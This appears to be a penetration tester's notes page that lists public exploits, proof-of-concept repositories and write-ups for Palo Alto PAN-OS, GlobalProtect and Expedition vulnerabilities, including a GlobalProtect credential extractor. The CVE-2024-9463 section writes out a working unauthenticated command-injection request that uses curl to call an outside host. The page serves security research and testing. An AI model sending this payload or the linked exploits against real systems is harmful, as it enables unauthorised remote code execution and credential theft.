Palo Alto

CVE-2024-3400 Palo Alto File Write Exploit

GitHub - ak1t4/CVE-2024-3400: Global Protec Palo Alto File Write ExploitGitHub

GitHub - ihebski/CVE-2024-3400: CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtectGitHub

PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474

Exploit module for PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474) by sfewer-r7 · Pull Request #19663 · rapid7/metasploit-frameworkGitHub

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474watchTowr Labs - Blog

GitHub - watchtowrlabs/palo-alto-panos-cve-2024-0012GitHub

Palo Alto Global Protect

GitHub - t3hbb/PanGP_Extractor: Tool to extract username and password of current user from PanGPA in plaintextGitHub

Extracting Plaintext Credentials from Palo Alto Global Protect - Shells.SystemsShells.Systems

Palo Alto Networks Expedition

CVE-2024-5910 - Remotely reset the Expedition application admin credentials

Palo Alto Expedition: From N-Day to Full Compromise – Horizon3.aiHorizon3.ai

CVE-2024-9463 - RCE unauthenticated

POST /API/convertCSVtoParquet.php HTTP/1.1         
Host: http://watchTowr.com         
Content-Type: application/x-www-form-urlencoded        
Content-Length: 72        

ram=watchTowr`curl+https://watchTowr.com`

Ref: https://x.com/watchtowrcyber/status/1844306954245767623?t=ibt0GSdt3qTVwHw54pdM1A&s=03

CVE-2024-9464 - Authenticated command injection vulnerability

GitHub - horizon3ai/CVE-2024-9464: Proof of Concept Exploit for CVE-2024-9464GitHub

CVE-2024-9465 - Unauthenticated SQL Injection

GitHub - horizon3ai/CVE-2024-9465: Proof of Concept Exploit for CVE-2024-9465GitHub